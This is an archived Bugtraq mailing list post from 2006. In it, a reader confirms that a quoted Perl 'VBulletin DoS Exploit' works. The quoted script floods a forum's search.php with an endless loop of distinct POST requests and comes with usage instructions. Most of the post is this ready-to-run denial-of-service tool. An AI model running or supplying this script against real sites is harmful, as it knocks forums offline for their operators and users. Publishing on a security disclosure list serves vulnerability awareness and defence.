lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon, 13 Nov 2006 23:25:37 +0100
From: "Bart Seresia" <bart@....be>
To: <bugtraq@...urityfocus.com>
Subject: RE: VBulletin DoS Exploit [ all Versions ]

Tested it on 2 of my local machines, non of them really crashed. But thy
both went in DOS. So I guess that part works ;-)

Tested it on vBulletin, version 3.5.4

-----Oorspronkelijk bericht-----
Van: root@...0r.ir [mailto:root@...0r.ir] 
Verzonden: zaterdag 11 november 2006 4:42
Aan: bugtraq@...urityfocus.com
Onderwerp: VBulletin DoS Exploit [ all Versions ]

# VBulletin DoS Exploit by www.h4x0r.ir
# 
# The exploit was tested on 15 machines And 13 of them got Crashed. 98%
Works ;) 
# 
# important => Image Verification in (search.php) is NOT Enabled.

# It works on 3.6.3 and prior [all] !
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0;
$i<9999999999999999999999999999999999999999999999999999999999999999999999;
$i++)
{
$user="h4x0r".$rand.$i;
$data =
"s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0
&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&
showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
$len = length $data;
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
               "Accept: */*\r\n".
               "Accept-Language: en-gb\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Accept-Encoding: gzip, deflate\r\n".
               "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)\r\n".
               "Host: $host\r\n".
               "Content-Length: $len\r\n".
               "Connection: Keep-Alive\r\n".
               "Cache-Control: no-cache\r\n\r\n".
 "$data";
     my $port = "80";
     my $proto = getprotobyname('tcp');
     socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
     connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
     send(SOCKET,"$foo", 0);
     syswrite STDOUT, "|" ;

}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";
print "\th4x0r Security Team\n";
print "\twww.h4x0r.ir\n\n";




exit();
};

# Exploit By www.h4x0r.ir

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ